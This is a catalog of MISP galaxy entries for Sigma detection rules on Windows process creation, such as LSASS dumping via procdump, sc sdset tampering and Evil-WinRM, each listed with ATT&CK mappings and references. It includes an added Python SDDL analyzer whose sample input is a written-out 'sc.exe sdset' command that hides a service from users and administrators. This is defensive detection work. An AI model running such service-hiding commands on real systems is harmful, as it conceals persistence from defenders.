https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_delete_safeboot.yml

Renamed AutoIt Execution

Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe. AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks. Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.

The tag is: misp-galaxy:sigma-rules="Renamed AutoIt Execution"

Renamed AutoIt Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10789. Table References

Links

https://www.autoitscript.com/site/

https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autoit.yml

Service Security Descriptor Tampering Via Sc.EXE

Detects sc.exe modifying a service's security descriptor ("sc sdset") with permissions that hide that service from enumeration.

The tag is: misp-galaxy:sigma-rules="Service Security Descriptor Tampering Via Sc.EXE"

Service Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10790. Table References

Links

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://twitter.com/0gtweet/status/1628720819537936386

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml
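
Both of the sc.exe sdset rules in this section (this one and "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE") alert on the command line; an analyst then has to read the SDDL to see what was actually denied. The following added example (not the rules' own logic and not MISP code) parses the DACL portion of the descriptor and reports deny ACEs against the critical trustees, so a "hide the service from interactive users and administrators" descriptor can be told apart from a benign hardening change. The command lines are constructed; the right-code names are the service-object meanings of the SDDL right strings.

```python
"""Parse the SDDL given to "sc sdset" and flag deny ACEs against critical trustees.

Added example; not the Sigma rules' own logic and not MISP code.
Command lines are constructed.
"""
import re
from dataclasses import dataclass

# Service-object meaning of the two-letter SDDL right codes.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
# Well-known SID strings whose denial on a service object is almost never legitimate.
CRITICAL_TRUSTEES = {"IU": "Interactive users", "SU": "Service logon users",
                     "BA": "Built-in Administrators", "SY": "Local SYSTEM",
                     "WD": "Everyone", "AU": "Authenticated Users", "BU": "Built-in Users"}


@dataclass
class Ace:
    ace_type: str   # "A" allow, "D" deny, "AU" audit, ...
    flags: str
    rights: list
    trustee: str


def parse_rights(text):
    """Split "DCLCWPDTSD" into ["DC", "LC", ...]; a hex access mask is kept verbatim."""
    if text.lower().startswith("0x"):
        return [text]
    return [text[i:i + 2] for i in range(0, len(text), 2)]


def parse_dacl(sddl):
    """Return the ACEs of the D: (DACL) component of an SDDL string."""
    m = re.search(r"D:(?:P|AI|AR)*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) != 6:         # conditional ACEs carry extra fields; ignored here
            continue
        aces.append(Ace(fields[0].upper(), fields[1], parse_rights(fields[2]), fields[5].upper()))
    return aces


def analyze_sdset(cmdline):
    """For an "sc sdset <service> <sddl>" command line, summarise the deny ACEs; None otherwise."""
    m = re.search(r"(?i)\bsc(?:\.exe)?\s+sdset\s+(\S+)\s+(\S+)", cmdline)
    if not m:
        return None
    service, sddl = m.group(1), m.group(2)
    denied = {}
    for ace in parse_dacl(sddl):
        if ace.ace_type == "D" and ace.trustee in CRITICAL_TRUSTEES:
            denied[ace.trustee] = [SERVICE_RIGHTS.get(r, r) for r in ace.rights]
    # Denying SERVICE_QUERY_STATUS to the accounts that run sc query / services.msc
    # drops the service from their listings; denying SERVICE_STOP to admins/SYSTEM
    # makes it unstoppable through the normal tooling.
    hidden = any("SERVICE_QUERY_STATUS" in r for t, r in denied.items() if t in ("IU", "SU", "BA"))
    unstoppable = any("SERVICE_STOP" in r for t, r in denied.items() if t in ("BA", "SY"))
    return {"service": service, "denied": denied, "hidden": hidden, "unstoppable": unstoppable}


# Constructed command lines: a hiding descriptor, a default-looking one, and a non-sdset call.
SAMPLE_CMDLINES = [
    "sc.exe sdset MyTelemetry D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)"
    "(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)",
    "sc sdset Spooler D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)",
    "sc query MyTelemetry",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(analyze_sdset(c))
```

Note that the first sample still contains an allow ACE for BA after the deny ACE; Windows evaluates deny entries first, so the allow does not undo the hiding, which is why the analysis reports deny ACEs regardless of what else the descriptor grants.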

PktMon.EXE Execution

Detects execution of PktMon, a tool that captures network packets.

The tag is: misp-galaxy:sigma-rules="PktMon.EXE Execution"

PktMon.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 10791. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Pktmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pktmon_execution.yml

Msxsl.EXE Execution

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

The tag is: misp-galaxy:sigma-rules="Msxsl.EXE Execution"

Msxsl.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10792. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msxsl_execution.yml

PrintBrm ZIP Creation of Extraction

Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.

The tag is: misp-galaxy:sigma-rules="PrintBrm ZIP Creation of Extraction"

PrintBrm ZIP Creation of Extraction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10793. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml

Renamed ZOHO Dctask64 Execution

Detects a renamed dctask64.exe, a binary signed by ZOHO Corporation that can be used for process injection, command execution and process creation

The tag is: misp-galaxy:sigma-rules="Renamed ZOHO Dctask64 Execution"

Renamed ZOHO Dctask64 Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10794. Table References

Links

https://twitter.com/gN3mes1s/status/1222095371175911424

https://twitter.com/gN3mes1s/status/1222095963789111296

https://twitter.com/gN3mes1s/status/1222088214581825540

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml

Remote Access Tool - NetSupport Execution From Unusual Location

Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files')

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - NetSupport Execution From Unusual Location"

Table 10795. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport_susp_exec.yml

File Download Via InstallUtil.EXE

Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"

The tag is: misp-galaxy:sigma-rules="File Download Via InstallUtil.EXE"

File Download Via InstallUtil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10796. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/239

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_installutil_download.yml

MSHTA Suspicious Execution 01

Detects suspicious mshta.exe execution patterns, some of which involve polyglot files

The tag is: misp-galaxy:sigma-rules="MSHTA Suspicious Execution 01"

MSHTA Suspicious Execution 01 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10797. Table References

Links

https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356

http://blog.sevagas.com/?Hacking-around-HTA-files

https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997

https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script

https://twitter.com/mattifestation/status/1326228491302563846

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml

Csc.EXE Execution Form Potentially Suspicious Parent

Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.

The tag is: misp-galaxy:sigma-rules="Csc.EXE Execution Form Potentially Suspicious Parent"

Csc.EXE Execution Form Potentially Suspicious Parent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Mshta - T1218.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004" with estimative-language:likelihood-probability="almost-certain"

Table 10798. Table References

Links

https://reaqta.com/2017/11/short-journey-darkvnc/

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html

https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml

New Root Certificate Installed Via Certutil.EXE

Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

The tag is: misp-galaxy:sigma-rules="New Root Certificate Installed Via Certutil.EXE"

New Root Certificate Installed Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10799. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml

Suspicious X509Enrollment - Process Creation

Detects process command lines that use the X509Enrollment COM object, which can be used to install certificates

The tag is: misp-galaxy:sigma-rules="Suspicious X509Enrollment - Process Creation"

Suspicious X509Enrollment - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

Table 10800. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42

https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml

Renamed Msdt.EXE Execution

Detects the execution of a renamed "Msdt.exe" binary

The tag is: misp-galaxy:sigma-rules="Renamed Msdt.EXE Execution"

Renamed Msdt.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10801. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_msdt.yml

HackTool - WinRM Access Via Evil-WinRM

Detects the execution of Evil-WinRM, a tool adversaries may use with valid accounts to log into a computer over Windows Remote Management (WinRM) and then perform actions as that user.

The tag is: misp-galaxy:sigma-rules="HackTool - WinRM Access Via Evil-WinRM"

HackTool - WinRM Access Via Evil-WinRM has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 10802. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm

https://github.com/Hackplayers/evil-winrm

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml

UEFI Persistence Via Wpbbin - ProcessCreation

Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section

The tag is: misp-galaxy:sigma-rules="UEFI Persistence Via Wpbbin - ProcessCreation"

UEFI Persistence Via Wpbbin - ProcessCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 10803. Table References

Links

https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c

https://persistence-info.github.io/Data/wpbbin.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml

Process Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "process" flag, which adversaries might use to list the processes running on the compromised host.

The tag is: misp-galaxy:sigma-rules="Process Reconnaissance Via Wmic.EXE"

Process Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10804. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml

UtilityFunctions.ps1 Proxy Dll

Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.

The tag is: misp-galaxy:sigma-rules="UtilityFunctions.ps1 Proxy Dll"

UtilityFunctions.ps1 Proxy Dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10805. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_utilityfunctions.yml

Potentially Suspicious Event Viewer Child Process

Detects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Event Viewer Child Process"

Potentially Suspicious Event Viewer Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10807. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_eventvwr_susp_child_process.yml

New User Created Via Net.EXE

Identifies the creation of local users via the net.exe command.

The tag is: misp-galaxy:sigma-rules="New User Created Via Net.EXE"

New User Created Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 10808. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md

https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler

Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious ASP.NET Compilation Via AspNetCompiler"

Potentially Suspicious ASP.NET Compilation Via AspNetCompiler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10809. Table References

Links

https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml

Run Once Task Execution as Configured in Registry

Detects the execution of a RunOnce task as configured in the registry

The tag is: misp-galaxy:sigma-rules="Run Once Task Execution as Configured in Registry"

Run Once Task Execution as Configured in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10810. Table References

Links

https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

https://twitter.com/pabraeken/status/990717080805789697

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml

Suspicious Execution of Powershell with Base64

Detects a command line that launches PowerShell with a Base64-encoded payload

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Powershell with Base64"

Suspicious Execution of Powershell with Base64 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10811. Table References

Links

https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets

https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml

Certificate Exported Via Certutil.EXE

Detects the execution of certutil with the "exportPFX" flag, which exports certificates (including their private keys) as PFX files.

The tag is: misp-galaxy:sigma-rules="Certificate Exported Via Certutil.EXE"

Certificate Exported Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10812. Table References

Links

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_export_pfx.yml

Potential PsExec Remote Execution

Detects potential PsExec commands that initiate execution on remote systems, based on common command-line flags used by the utility

The tag is: misp-galaxy:sigma-rules="Potential PsExec Remote Execution"

Potential PsExec Remote Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 10813. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://www.poweradmin.com/paexec/

https://docs.microsoft.com/en-us/sysinternals/downloads/psexec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml

Whoami.EXE Execution With Output Option

Detects the execution of "whoami.exe" with the "/FO" flag to select CSV output, or with redirection operators that write the result to a file for later use.

The tag is: misp-galaxy:sigma-rules="Whoami.EXE Execution With Output Option"

Whoami.EXE Execution With Output Option has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10814. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_output.yml

Potential Process Execution Proxy Via CL_Invocation.ps1

Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process"

The tag is: misp-galaxy:sigma-rules="Potential Process Execution Proxy Via CL_Invocation.ps1"

Potential Process Execution Proxy Via CL_Invocation.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10815. Table References

Links

https://twitter.com/bohops/status/948061991012327424

https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml

Suspicious Microsoft OneNote Child Process

Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.

The tag is: misp-galaxy:sigma-rules="Suspicious Microsoft OneNote Child Process"

Suspicious Microsoft OneNote Child Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10816. Table References

Links

https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18

https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml

Renamed FTP.EXE Execution

Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed FTP.EXE Execution"

Renamed FTP.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10817. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_ftp.yml

Potential LSASS Process Dump Via Procdump

Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we are also able to catch cases in which the attacker has renamed the procdump executable.

The tag is: misp-galaxy:sigma-rules="Potential LSASS Process Dump Via Procdump"

Potential LSASS Process Dump Via Procdump has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10818. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml

JSC Convert Javascript To Executable

Detects the execution of the LOLBIN jsc.exe, used by .NET to compile JavaScript code to .exe or .dll format.

The tag is: misp-galaxy:sigma-rules="JSC Convert Javascript To Executable"

JSC Convert Javascript To Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10819. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Jsc/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml

Potential Homoglyph Attack Using Lookalike Characters

Detects the presence of Unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attack characters.

The tag is: misp-galaxy:sigma-rules="Potential Homoglyph Attack Using Lookalike Characters"

Potential Homoglyph Attack Using Lookalike Characters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10820. Table References

Links

http://www.irongeek.com/homoglyph-attack-generator.php

https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_homoglyph_cyrillic_lookalikes.yml

HackTool - Quarks PwDump Execution

Detects usage of the Quarks PwDump tool via commandline arguments

The tag is: misp-galaxy:sigma-rules="HackTool - Quarks PwDump Execution"

HackTool - Quarks PwDump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 10821. Table References

Links

https://github.com/quarkslab/quarkspwdump

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml

Execute MSDT Via Answer File

Detects execution of "msdt.exe" using an answer file, which simulates the legitimate way of calling msdt via "pcwrun.exe" (for example from the compatibility tab).

The tag is: misp-galaxy:sigma-rules="Execute MSDT Via Answer File"

Execute MSDT Via Answer File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10822. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msdt/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml

Findstr Launching .lnk File

Detects usage of findstr to identify and execute an .lnk file, as seen in the HHS redirect attack.

The tag is: misp-galaxy:sigma-rules="Findstr Launching .lnk File"

Findstr Launching .lnk File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 10823. Table References

Links

https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lnk.yml

Suspicious ScreenSave Change by Reg.exe

Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

The tag is: misp-galaxy:sigma-rules="Suspicious ScreenSave Change by Reg.exe"

Suspicious ScreenSave Change by Reg.exe has relationships with:

